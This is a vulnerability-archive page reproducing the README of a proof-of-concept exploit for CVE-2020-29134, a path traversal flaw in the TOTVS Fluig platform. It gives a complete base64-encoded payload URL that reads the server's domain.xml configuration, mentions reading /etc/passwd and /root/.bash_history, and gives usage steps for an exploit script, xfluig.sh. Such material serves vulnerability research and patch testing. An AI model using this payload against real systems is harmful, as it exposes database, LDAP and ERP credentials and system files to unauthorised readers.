Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2020-29134 PoC — Totvs TOTVS Fluig 路径遍历漏洞

Source
https://github.com/Ls4ss/CVE-2020-29134
Associated Vulnerability
Title:Totvs TOTVS Fluig 路径遍历漏洞 (CVE-2020-29134)
Description:The TOTVS Fluig platform allows path traversal through the parameter "file = .. /" encoded in base64. This affects all versions Fluig Lake 1.7.0, Fluig 1.6.5 and Fluig 1.6.4
Description
Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal
Readme
# Totvs Fluig Platform
     
     Fluig is the productivity and collaboration platform that integrates with the ERP system,
     and your company's other systems to revolutionize the way you and your team work.
 
# CVE-2020-29134
     
     The TOTVS Fluig platform allows path traversal via parameter encoded in base64.
     When exploited, this vulnerability allows the reading of sensitive XML files, which contain
     data to access the database and, in some cases, LDAP connections and ERP system integrations.
     In addition, it is also possible to explore system files, such as /etc/passwd and /root/.bash_history
     
#### Versions affecteds 
    --
    <== Fluig Lake 1.7.0
    <== Fluig 1.6.5
    <== Fluig 1.6.4
    ...
#### Patched versions
    <== Fluig Lake 1.7.0-210303 (Patched)
    <== Fluig 1.6.5-210308 (Patched)
    <== Fluig 1.6.4-210308 (Patched)

# Building Payload

![alt text](https://raw.githubusercontent.com/lucxssouza/CVE-2020-29134/main/Payload-Parameter.png?raw=true)

#### Attack Vector
     http://fluig.host.com/volume/stream/Rmx1aWc=/
#### Path traversal plain text
     ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml
#### Path traversal encoded base64
     P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
#### Payload 
     http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
     
#### Exploit-DB reference
     https://www.exploit-db.com/exploits/49622

     
# Clone Repository

     # git clone https://github.com/lucxssouza/CVE-2020-29134.git
     # cd CVE-2020-29134
     # chmod +x xfluig.sh

# Usage

     Ex1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (number of requests generated by wfuzz)

     Ex2: ./xfluig.sh http://fluig.host.com:PORT
File Snapshot

 [4.0K]  /data/pocs/ee7e735bb21bcd7728b81409543b7605436c1ecc
├── [192K]  Payload-Parameter.png
├── [2.0K]  README.md
└── [10.0K]  xfluig.sh

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →